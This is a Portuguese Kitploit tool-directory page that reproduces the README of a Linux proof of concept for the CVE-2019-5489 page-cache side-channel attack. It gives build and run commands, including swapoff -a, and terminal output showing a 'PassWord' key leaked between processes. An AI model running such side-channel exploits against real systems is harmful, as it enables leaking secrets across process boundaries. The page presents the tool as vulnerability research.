Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-5489 — Ataques de canal lateral em Page Cache (CVE-2019-5489) — prova de conceito para Linux | Kitploit
Ferramentas/GitHubGitHub/mmxsrup/cve-2019-5489
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesPapers e PesquisaAprendizado e EducaçãoExploração de Binários
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Ataques de canal lateral em Page Cache (CVE-2019-5489) — prova de conceito para Linux

Ver Repositório
103há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE 2019-5489

Este repositório contém a prova de conceito para Linux dos ataques de canal lateral de cache de páginas (CVE-2019-5489).

Para avaliar o canal lateral de cache de página, implementei um canal encoberto entre dois processos. O processo remetente envia dados confidenciais a um processo receptor por meio do canal lateral de cache de página. Os ataques de cache de página foram mitigados no Linux Kernel 5.0 e versões posteriores, portanto esta PoC só funcionará antes do Linux Kernel 5.0.

NOTA: Testei e funciona no Ubuntu 18.04, Linux 4.15.0-70.

Compilação

Execute o seguinte comando.

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

Execução

Desative o espaço de swap para facilitar o ataque.

root@kitploit:~
swapoff -a

Terminal 1

Primeiro, execute o seguinte comando no terminal 1.

root@kitploit:~
make run-sender

Terminal 2

Depois que sending 1th character ... for exibido no terminal 1, execute o seguinte comando.

root@kitploit:~
make run-receiver

Saída

Se a execução for bem-sucedida, a seguinte saída será exibida.
Isso mostra que a chave foi enviada do processo Remetente (Sender) para o processo Receptor (Receiver) por meio do canal lateral de cache de página.

Terminal 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

Terminal 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

Referências

  • Daniel Gruss et al. Page cache attacks [CCS 19]
Baixar ferramenta